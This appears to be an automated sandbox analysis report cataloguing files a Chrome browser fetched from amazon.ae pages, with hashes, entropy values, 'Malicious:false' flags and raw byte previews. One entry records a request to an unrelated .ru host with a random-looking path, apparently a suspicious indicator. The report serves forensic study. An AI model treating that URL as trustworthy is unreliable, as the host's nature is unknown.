URL:https://www.amazon.ae/rd/uedata?s-on-search-route&v=0.295509.0&id=RP6015S40NY7Z1AX6ZEM&ctb=1&m=1&sc0=s-on-search-route&pc0=10497&s-on-search-route0=10497&t0=1724264941683&rt=__&csmtags=aui|aui:aui_build_date:3.24.6-2024-08-16|mutObsYes|ewc:unpersist|ewc:unpersist:emptycart|ewc:bview|ewc|ewc:unrec|ewc:cartsize:0|ewc:aui|navbar|aui:sw:page_proxy:no_ctrl|supports:mutationobserver:true|supports:getelementsbyclassname:true|supports:map:true|mutObsActive|FWCIMEnabled|fls-eu-amazon-ae|adblk_no|perfYes|cf_cdn_fr|fy_cdn_mp|adrender:a6b228d9-6ecf-4580-a80f-06ec30d01262|adrender:Search:auto-bottom-advertising-0:portal-batch-fast-btf-loom|adrender:safeframe:a6b228d9-6ecf-4580-a80f-06ec30d01262|adrender:safeframe:Search:auto-bottom-advertising-0:portal-batch-fast-btf-loom|adrender:a6b228d9-6ecf-4580-a80f-06ec30d01262:creativetemplatename:dynamicecommercesdciaedesktop|adrender:Search:auto-bottom-advertising-0:portal-batch-fast-btf-loom:creativetemplatename:dynamicecommercesdciaedesktop|adrender:a6b228d9-6ecf-4580-a80f-06ec30d01262:creativeid:0|adrender:Search:auto-bottom-advertising-0:portal-batch-fast-btf-loom:creativeid:0|adrender:a6b228d9-6ecf-4580-a80f-06ec30d01262:programid:1027|adrender:Search:auto-bottom-advertising-0:portal-batch-fast-btf-loom:programid:1027|safeFrame:8e0c4c15feaa708dde4b89323fa4b7f30304fda8:adplacements:search:auto-left-advertising-1:search-desktop-loom:abpstatus:notenabled|safeFrame:8e0c4c15feaa708dde4b89323fa4b7f30304fda8:adrender:search:auto-left-advertising-1:search-desktop-loom|safeFrame:8e0c4c15feaa708dde4b89323fa4b7f30304fda8:adrender:search:auto-left-advertising-1:search-desktop-loom:creativeid:0|safeFrame:8e0c4c15feaa708dde4b89323fa4b7f30304fda8:adrender:search:auto-left-advertising-1:search-desktop-loom:programid:1027|safeFrame:8e0c4c15feaa708dde4b89323fa4b7f30304fda8:adrender:search:auto-left-advertising-1:search-desktop-loom:creativetemplatename:dynamicecommercesdciaedesktop|csm-feature-touch-enabled:false|aui:css:cache|aui:js:cache&viz=visible:4&pty=Search&spty=List&pti=undefined&tid=RP6015S40NY7Z1AX6ZEM&aftb=1&lob=1
                                                                                                                                                                                                                                                                      Preview:<!DOCTYPE html><html><head><title>x</title></head><body></body></html>.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, progressive, precision 8, 3000x1200, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):123586
                                                                                                                                                                                                                                                                      Entropy (8bit):7.854887603234212
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3072:48mRMNYwj8SUb5Le2xK3HbkQNZjiBG8c/FRta2wz6:5mqNhPY5RgbTN1iBnKRj
                                                                                                                                                                                                                                                                      MD5:782AEB22C8C1F14307FC2CDF46C600D7
                                                                                                                                                                                                                                                                      SHA1:68BAD28DCA2B48CDDD442F39FC3766F27359B418
                                                                                                                                                                                                                                                                      SHA-256:13BC65C752CEDA5ACE035EFF0679E4E9502123E0378855CAA1A0AD04E511344F
                                                                                                                                                                                                                                                                      SHA-512:21DE5BC1F7B3EC1D97D944BFE604C3963D3EBFF3900E4EC778ACDBDC181B548DF0796548BBB62213A6E940F42C2D89407B623E8101E8A0DF39549D52E91F7990
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/61sAC7469bL._SX3000_.jpg
                                                                                                                                                                                                                                                                      Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1], baseline, precision 8, 1940x500, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):94765
                                                                                                                                                                                                                                                                      Entropy (8bit):7.824630868878005
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:1536:XElaBISdmlRU+Zk3lvkved+DAMlfPt0sjyZw9vA0ZIe8nKVUvb9Zm:AaBI9gfd+E8PuuUuxZlyZI
                                                                                                                                                                                                                                                                      MD5:523FBB27B5717D668DB3E968E1D8E08F
                                                                                                                                                                                                                                                                      SHA1:FD6B3457368C115A7B64E18F8A41E2803005AB68
                                                                                                                                                                                                                                                                      SHA-256:4F5715CF25A08B349C1A01028C95FF3C670D9DA4289C92D8DF0920F0956F420E
                                                                                                                                                                                                                                                                      SHA-512:F7BD222AD03570E1B9C30488D6BF061BE0059CF1C3EC2D5328585C45248F7893518FDD94FBC18975A72C26B45436B973E5FC8C742505D0DD692E72BEE211E88B
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/S/al-eu-726f4d26-7fdb/192b0df3-8002-4ca6-8283-ff7193353200.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF.............JExif..II*.......i.........................,...............Version 1.0.0....C....................................................................C......................................................................................................................b...........................!1.AQa.."2q.B....#Rbr...37su.......$6Cc45St....%DTUV.......&8.....(..................................A........................!1.2AQa.."q...BR....#3br....$......CSs.............?...r.........................................................................................................................................................................................................................................................................................@@@@A........................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):3363
                                                                                                                                                                                                                                                                      Entropy (8bit):7.875123562954156
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:TOR92BljYNzwlVqpkkfXzHATgJ0Yn3yl9k5mC:+92LScl/8PCl9k5mC
                                                                                                                                                                                                                                                                      MD5:4B9053233695A8DBAB937A203793463C
                                                                                                                                                                                                                                                                      SHA1:F05370989F36DF570BE7C0AADE4A6F941A4E3BE7
                                                                                                                                                                                                                                                                      SHA-256:C094100CC39A04E9FCF17069E0A45D0D47E4F7F0100726F2164746CDC49D34D9
                                                                                                                                                                                                                                                                      SHA-512:98683D6B29B4C438A894018C87587632C74D204B9488CFF0AD181DA9D66511628DE2081A2D7B85A4F574226117A0FDEEDCB8D06CE39C1FFC7E1D515842EE851A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_TVs_1x._SY116_CB659040198_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."................................................................!A.."12Qq...a....BTr...#RSU.34Ds......................................................!1R...A.."2BQqSa...#............?...B......!.!.@.F....!.!.8@a.8F..B...U.j6..It.C.d.c&pkA..Y....lE..Ws..|l.y43I....#.kZ..y....{F.(...Y.._.w......w.H..#..w#(....vj vc. ......%......FHes.&.q.....a.....o.]."....6...v....>)L.g{~.WK.\*.ME..*`|N.....p)!/#q.G...b.J........I....]/.$;u{.....t.x0....t..j...n]....|.....W...M..9.r...Dw...K.._^o...........4...G...w....1.......m.g.|...{.......GS.o.Iwc...}|...........@T}..J.z...9wd..]..=.....2(.C.pI!Lj..}.*n_.E..b.5...*.Q.}%..+Zr...d*s.'(........A..............*..ByQ.>.ioR.....%.....I..>6..i!.f\...bG....C8...S}=..:.O.G5RCZ..zY'.....4.....[.E...0-..tC.....i.G[.#.*.....-.=.+gc..H+..g.M.....At.I$q..Y#..L.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):3545
                                                                                                                                                                                                                                                                      Entropy (8bit):7.857076115319748
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:4J33UHXxeaa5qmMvoQ7oQUUXN+xEKAkbdEItdx8n8MZNKQaxjnWBek5ua0CpZGD:iIkaa07tnXNIAkbyU88MZ4sAaubC3q
                                                                                                                                                                                                                                                                      MD5:85B40FA7430C7C8B73F2698B3E7975B1
                                                                                                                                                                                                                                                                      SHA1:0D2AEC6E4434A9B29ABA0704DEF82990A2ACCD85
                                                                                                                                                                                                                                                                      SHA-256:EF1AE84821A24B0D1DD882B70121E278BBEBA7E8017B05B69C6EA21AF83F0B31
                                                                                                                                                                                                                                                                      SHA-512:176C81985059D6404E926986B840B6BEEE4D89B90ECCDCE6E7D4C43BD383F1B59E3245C0377D5654F0DB0157054FD3EE6E2630F2B455624C925FC6192E803104
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF...........................................)......)$,$!$,$A3--3AK?<?K[QQ[rlr................................)......)$,$!$,$A3--3AK?<?K[QQ[rlr.........t...."..........4...................................................................<.\...f.+...C..7-D..P...G+m..j..,..w...S.}......\.].*..D.4sM..;a.|...j..F.W.L.@ ../bt.G.4B..s%"A..F)...\ hV"...../.....U...2..u..y.g Q....Z.2..[..Z..*.y=..$..._.....?..k.G...A...T...8..".h..p4K.@AP!dtR6..1......^O.."F....2..H.O0_...p..p4K.......4..;.....2.?.UO....Y.&.O_mS......p..`."....q{.:.m+.*8.["a.U...S].jU4dw...........%...Wa..,V..*\.Wn...x."r.XaB.6.(......?.........................!1..AQ...."02Ta. #Rq..$34BSs..&c.r..........?...:...M..!..rX.W.9..?...s.,~3_H..H.f..M...zv_.O..N.....zvo...k.|<~#^............e.x.F.>.>./..N.....zr_.O.....7.7.o.......WZ...H.$..=......y..^.(!}/V..L..v1..*=6...".dg.f.....ugn.v.V.J.$.....2...Ocd.n........;...!.Wze.P.<.J.i*.(.(.w..+D..H.......M..n.n.Z......."w.QxXL...b0.%....."#E1.+v...{
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 200x200, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):10686
                                                                                                                                                                                                                                                                      Entropy (8bit):7.952739433473174
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:x2YfiwfZdBCXlQnFbmCjsnc5HzbhGBtHN1cJC4EJNZ502Y1fqqlQMmP0:x2y9ZdcyYCjsc5TCN1cJC4EJNZY1qM1
                                                                                                                                                                                                                                                                      MD5:05D3976131DDD36B2F5E1E5991A21AFC
                                                                                                                                                                                                                                                                      SHA1:C2D257D568BFFBA36EEDEFE74EBE92B2A1280908
                                                                                                                                                                                                                                                                      SHA-256:55ED80112347C554728CEAB3B673CC43AA29C8F6B264465A692A736E80DCD56C
                                                                                                                                                                                                                                                                      SHA-512:79285166C08323F71189D3FA7F2CE78A35351490206B93238CF7C6A5BB6A3546C6A164A20BDACDA40CEE6918BC19CAF0C74EBC70C629A2FB3BCD34E4EE6C6429
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!..1."A.Q#2aq....3Brt...$5R..%4eu................................................!1..."AQa.2q.....#.....$3B...............?..t.).JR...).TW\z.......p..K#.DF.@...z..........=Q...Q.=N...W8.p.e.?.B......?t.....{.]:._.C.. ...=Tu.T.;..O.........X..8...{:....-..._]k.Kq.....{.-....=.....P..Eq.].....)*......N.6.+$.C..]..%F...>.....gir.....&...M-..id.M...4..NG........`..fz.".%...J.,.....^..N.. 2G$..D.....;.G.&.zF.T....]:l0....OF..:.&.\..~.}..T.(.|G8.O..t.^......)J.<.)H.R...)H.R...)H.R...$.".v.~...]E.%-..h..."wi=.P~v......F......e....5.."{W.N!(....N...!yc.....fe. y VN.=%..;....3..N..+...$..V....+....I..1.YO+..x5....h.I&............!Y.%..c/`qU..f.5.N..-O$`..t....k..,./.b..I....`.....q.R...m.:xK2A...w...n.D...M....o8RMK:.'..mv.q.,..E...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://ghd.dultzman.ru/lbjugybcltimsfvhhnjnepscptVQgEFCjVXGWERNGKBOVSOKGBCEDBFKGYJF
                                                                                                                                                                                                                                                                      Preview:1
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (6950)
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):265764
                                                                                                                                                                                                                                                                      Entropy (8bit):5.399539428872105
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:6144:Hwqd+moT/R99rjvyb3R4agBnJAQpwu6tqHlrIjXgeT6LkXtTlNJ86kziU1Bh+qoe:Hwqd+moTNrjvyb3R4agBnJAQpwu6tqH5
                                                                                                                                                                                                                                                                      MD5:80013F4D46B39587E446A634F5EBCCF4
                                                                                                                                                                                                                                                                      SHA1:768AAEF09F810DFE75C101A76A7828EA7B5CF15E
                                                                                                                                                                                                                                                                      SHA-256:7CA39CE45204BFDC7841D7B24F5A395C41CA5F4E5871A18E933C4D128C09965B
                                                                                                                                                                                                                                                                      SHA-512:2433F95A32A41BD06830A906BAC2FD6E4832044C3D6DDDD82C013CB0A8EB4EF6B3223BD1BDEC3895F72C041D7AEFC2754EC2A60C8BCB3C153F73FAE73A2BBAEA
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/81l6Jv+52XL.js?AUIClients/FWCIMAssets
                                                                                                                                                                                                                                                                      Preview:////////////////////////////////////////////.;(function (packageFunction) {. /* istanbul ignore next */. var p = window.AmazonUIPageJS || window.P;. /* istanbul ignore next */. var attribute = p._namespace || p.attributeErrors;. /* istanbul ignore next */. var namespacedP = attribute ? attribute("FWCIMAssets", "") : p;.. /* istanbul ignore next */. if (namespacedP.guardFatal) {. namespacedP.guardFatal(packageFunction)(namespacedP, window);. } else {. namespacedP.execute(function () {. packageFunction(namespacedP, window);. });. }.}(function(P, window, undefined){.// BEGIN ASSET FWCIMAssets - 4.0./////////////////////////.// BEGIN FILE src/js/fwcim.js./////////////////////////./*...Full source (including license, if applicable) included below..*/./******/ (function(modules) { // webpackBootstrap./******/ .// The module cache./******/ .var installedModules = {};./******/./******/ .// The require function./******/ .function __webpack_require__(moduleId) {./******/.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 440x500, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):27489
                                                                                                                                                                                                                                                                      Entropy (8bit):7.968573607984877
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:1hBsScZLo5b3w8UA3oQ98RtlTGjaFU+ufLZyCz0C2h9o:5sSclo57w8UA358jlTE7DLJ00
                                                                                                                                                                                                                                                                      MD5:6175CD90D629B20DBF55976692D2E378
                                                                                                                                                                                                                                                                      SHA1:1B703B8AF62F24304C426672D71BCDD207CB509F
                                                                                                                                                                                                                                                                      SHA-256:60E0B2E760F4CD700B36F40EDC6434FBFCF6F5F5C61AC8F7A7004386D507A545
                                                                                                                                                                                                                                                                      SHA-512:B6CCB850666CAF1D7BC7185C2826DA156C29AE8A9DC845AA06CD70D0EB201E319239D04718349C7D9C8766F45777F7ED019EBF2EB3B03AF0E96386B0699815A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."................................................h...[..5.*..(.s...L>q._.u$q..cF.....lrit}.u.z.....U.=.F..oas.....#.6..F.Q.<.&...A..y....k"dp.qx1"..E.......Q.....hK.Q.)tv.#..X..S..<...4mH..y_...(..5...&.(...[.Q.\...k.....D.....8.c..DF.X.....[....U.K.....U.....k..+.......O..$R........_,.8.sOiH.a.K..%....Q5.F..E..clo...V6..s.$.....\...?K .:J.....h..M.lO...5\.I-.......D.G....I.1G.#h.".<.4.Mn.}QA^.I-.y..G....qDG...E.C.Q....TF.<...M....s.|....u....ej.A.z....(...h.........,..I.5.k;..#..d......7E.1........5...m..y.,..z....'..s..=../^...{..!.(...@...lSln.F:{.K$.N....^:.3.g..s./W.M.(......D-.;.9.7.+.<.I$......x.xk..y...n.:..a..1.A..[.v$S..6.K+.$..s;;.........wQ..pt...Q..h.EK~N..cc....#...$....!.Z....!..y.~.n8adl...".<.....ErI$p..$......Y....[....t.0..#dlA..\.6+..%..@t.=.^UE.422...5.z..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):48064
                                                                                                                                                                                                                                                                      Entropy (8bit):7.955174283015297
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:vMHyJf0aUwF5IBIxnpHHGGTDov1XQquWx33Y8jr/IPMrx9oVHeRIRIRIRIRIRIRq:UHyJcLwXAI1pHH7voPxnyJaQQQQQQQQK
                                                                                                                                                                                                                                                                      MD5:6A3CD793F81CFDA92281B7A050954466
                                                                                                                                                                                                                                                                      SHA1:63C520FC0955FE991728C309F5F829A9C1F0256D
                                                                                                                                                                                                                                                                      SHA-256:57D984BCDCAFD62C5D22A46272432125C57D57F7C42140F50AA3C9567D6CA195
                                                                                                                                                                                                                                                                      SHA-512:A9C5CFA516CE4591F9D615A10D5CC07DCBF80FE7845AE398677A9AA3EDCBBAB80EB993BBE455F1076624B1EDF0ADDBEFAE867F30AE1CDB1A04FA6F7A96919E60
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/Associates/2407GH040_AE_PD23_GW_bubbler_TCEE_PCaccessories_400x400_EN._CB567012733_.jpg
                                                                                                                                                                                                                                                                      Preview:.............................................................................................................................................2....Adobe.d............................................................................................................!..1A."Qa..2Bq....#RV.....$Tr..%368Cbu.....4Scestv......&5DFd.........9W.............................!1A"2Qaq......RS........Br....#3Tb..C$45.%s.c............?.......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(...?........P..@(......P..@(...>....,.I..W........G....{Yc.s...`.k...U.5.k/\....2^"..../[1.....[J.ib.wp|...,.~.>..?.....(..7.t..u5.m..&\g..{.....Z..b...>k..y.[m.c.j.p.....-w.c.m...<._j.....v..D.p,...J#....\.G.....><iT../.I..L2...+....{.o..].G.7.1...6..C..J..7.)|.$G6....d..V....... [...mY.`d.....?.dY...:..Do.....jT..V...*...$?......70~G\.I...7.9...d...&..F.Q.w7.r....?..R.#......&.@.....%..2....O.......%J....W.<.....v......e(.....9.sR.~..i...Z\Ory..WO.F.i....hK.T..._...{+y)D.l.+.'DY...F/.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (10372)
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):10450
                                                                                                                                                                                                                                                                      Entropy (8bit):5.228070049895735
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:Vb3JVaxC6DPmXsCXMdc1OdVLWRiJsNbKE08S12L1NOi:VLIC6De8RdVaRxNIoL1NOi
                                                                                                                                                                                                                                                                      MD5:74E590D62AE72E7CFE03C4EE6BD4EA5E
                                                                                                                                                                                                                                                                      SHA1:A0E05FE40A6233D78162A96EFDFD14077F1C6283
                                                                                                                                                                                                                                                                      SHA-256:50994C0128B4438C67A104BB948C40681FC8199B1A42FC48FC75BA5E6F814793
                                                                                                                                                                                                                                                                      SHA-512:D8AE8D4527D9286FC97CEA6A421547C6EEA20DB1BB9192F7FF6F36713689EF54A747333C343C825A56235ABBEF0827F2C0E693244C7F150D8CA7B330C145EB12
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/31OyASKbVLL.js
                                                                                                                                                                                                                                                                      Preview:/*! For license information please see react.production.min.js.LICENSE.txt */.!function(){"use strict";var e,t;e=this,t=function(e){function t(e,t,n){this.props=e,this.context=t,this.refs=L,this.updater=n||T}function n(){}function r(e,t,n){this.props=e,this.context=t,this.refs=L,this.updater=n||T}function o(e,t,n){var r,o={},u=null,a=null;if(null!=t)for(r in void 0!==t.ref&&(a=t.ref),void 0!==t.key&&(u=""+t.key),t)D.call(t,r)&&!V.hasOwnProperty(r)&&(o[r]=t[r]);var i=arguments.length-2;if(1===i)o.children=n;else if(1<i){for(var l=Array(i),c=0;c<i;c++)l[c]=arguments[c+2];o.children=l}if(e&&e.defaultProps)for(r in i=e.defaultProps)void 0===o[r]&&(o[r]=i[r]);return{$$typeof:g,type:e,key:u,ref:a,props:o,_owner:U.current}}function u(e){return"object"==typeof e&&null!==e&&e.$$typeof===g}function a(e,t){return"object"==typeof e&&null!==e&&null!=e.key?function(e){var t={"=":"=0",":":"=2"};return"$"+e.replace(/[=:]/g,(function(e){return t[e]}))}(""+e.key):t.toString(36)}function i(e,t,n,r,o){var
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x320, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):36947
                                                                                                                                                                                                                                                                      Entropy (8bit):7.985836765195575
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:hqIB2ZOGmpXRNhBHUXnC3sR1K29xFdaO/bhnfSbya:cIB2ZeVB0XKsR1BnF0OThfSb1
                                                                                                                                                                                                                                                                      MD5:500D3ABFBD66856D51AE46016B52446F
                                                                                                                                                                                                                                                                      SHA1:BEDDC7CD8E1195A8D0E1A870357249C6A01546AD
                                                                                                                                                                                                                                                                      SHA-256:BA051C408BD91213185B11BC52BD07A3E9AE9114E701E64CF575CC1CDB21C6D7
                                                                                                                                                                                                                                                                      SHA-512:436DBC6259BDAD4CEA66F84EA7819366EEE74C802983E09F13004F07494EC9EAD297579632DD17B79A5F0271A7E5CDF9AE65D1D41FB4CF0310ED9B4E6ECD2A5B
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/71-6gmcJ+TL._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@.@.."..........3...............................................................g......r...|..a._h...da..K.p..Nn...8..k...C}....Z.F.|..>}.:........v..K./..r#.^.|.Y}./p..u.e...w.|..@..kV.!P....K....#.7).T.s.../:e<0.',(.GI[SuNt.~......O{....a.....v..p..7.^...-.*K.E=..9.....W....1.K.p..^..............a..sG......z..H....=...|}.3....VzKG. .G/9.M...Rm....n$.&Ct....v..X..C.Zw.y.}...O.....!...j.r^$.U.m.%..*.....,T..}.'....6.qLj@.WD(.v2GE.g..=E.R.6.G....*./0jM.[...1_jf...a.v..U..x..c.c2wm....qG....q..u..u..=.h.N..g.w.5..Lz.{..k....p8d.....@.,..@b.."1....\...[...n..E..F.B..:....KQ.b.....n.5..g.tT..:+....]4.BU.L.O7+.X..+1./...<6..F....EJ........3j..wE.w....r.._...n.wSR......c.&..?An.o...../.)..*.|.....!...@L..2....E-....0c...S\.....o.{.\2.{$....C....ARMe...}...PQ.'[..P...j.&5..r./D....4z,r/.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines (9518)
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):1590821
                                                                                                                                                                                                                                                                      Entropy (8bit):5.769328844759248
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:6144:nHfm+1WgnzA5NWUyVzo3YPfnJOLp7/ugxHx0e/YCyBYmoPcTw3+JkTNkgIsWpWee://LQepM7JRj8ehbeUB
                                                                                                                                                                                                                                                                      MD5:1D777F3F771A7F9453B38203F7C7AA4D
                                                                                                                                                                                                                                                                      SHA1:F366F3D7C8E87387F8766B5CA1133F6CB2F7CEE9
                                                                                                                                                                                                                                                                      SHA-256:57B0EE675DBFF4B54EDCEEF36C50A73E4DE0B4A08638F44901479BFD5A79683E
                                                                                                                                                                                                                                                                      SHA-512:62BCA69259E9CD27FF369E09D999BE0882DD523809F26D847FBAF730A280779EB1EF9C02FCD142EE62927542624975DAFC4BC0730A7AE172BB4087CB814CC102
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://www.amazon.ae/s/?_encoding=UTF8&k=toys&crid=33DY8CRTKE0JW&sprefix=toy%2Caps%2C204&ref=nb_sb_noss_1&pd_rd_w=vdKJ7&content-id=amzn1.sym.0e2c3eeb-0b89-4f8d-9470-ba5240f72926&pf_rd_p=0e2c3eeb-0b89-4f8d-9470-ba5240f72926&pf_rd_r=APAVCQJMFK78QJEV1PMZ&pd_rd_wg=vThym&pd_rd_r=eb837932-48d0-4d35-b743-a6bf62f5a886&ref_=pd_hp_d_atf_unk
                                                                                                                                                                                                                                                                      Preview:<!doctype html><html lang="en-ae" class="a-no-js" data-19ax5a9jf="dingo"> sp:feature:head-start -->.<head><script>var aPageStart = (new Date()).getTime();</script><meta charset="utf-8"/>. sp:end-feature:head-start -->. sp:feature:csm:head-open-part1 -->..<script type='text/javascript'>var ue_t0=ue_t0||+new Date();</script>. sp:end-feature:csm:head-open-part1 -->. sp:feature:cs-optimization -->.<meta http-equiv='x-dns-prefetch-control' content='on'>.<link rel="dns-prefetch" href="https://images-eu.ssl-images-amazon.com">.<link rel="dns-prefetch" href="https://m.media-amazon.com">.<link rel="dns-prefetch" href="https://completion.amazon.com">. sp:end-feature:cs-optimization -->. sp:feature:csm:head-open-part2 -->.<script type='text/javascript'>.window.ue_ihb = (window.ue_ihb || window.ueinit || 0) + 1;.if (window.ue_ihb === 1) {..var ue_csm = window,. ue_hob = +new Date();.(function(d){var e=d.ue=d.ue||{},f=Date.now||function(){return+new Date};e.d=function
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):466
                                                                                                                                                                                                                                                                      Entropy (8bit):5.149474448497266
                                                                                                                                                                                                                                                                      Encrypted:false
